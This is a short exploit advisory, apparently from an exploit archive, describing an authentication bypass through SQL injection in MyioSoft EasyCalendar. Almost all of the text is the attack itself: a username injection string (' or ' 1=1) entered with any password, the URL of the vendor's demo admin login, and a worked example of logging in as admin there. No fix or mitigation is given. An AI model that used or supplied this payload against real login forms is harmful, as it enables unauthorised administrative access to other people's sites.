id: 4119
date: 11/07/2008
title: MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability
author: ZoRLu
cves: 

======================================================================
MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability
======================================================================


[~] MyioSoft EasyCalendar Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 07.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------

Exploit:

username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )

password: ZoRLu

note: generally admin name: admin


admin login for demo:

http://myiosoft.com/products/EasyCalendar/demo/


example for demo:

admin: demo1 ' or ' 1=1

passwd: ZoRLu




#  0day.today [2023-03-23]  #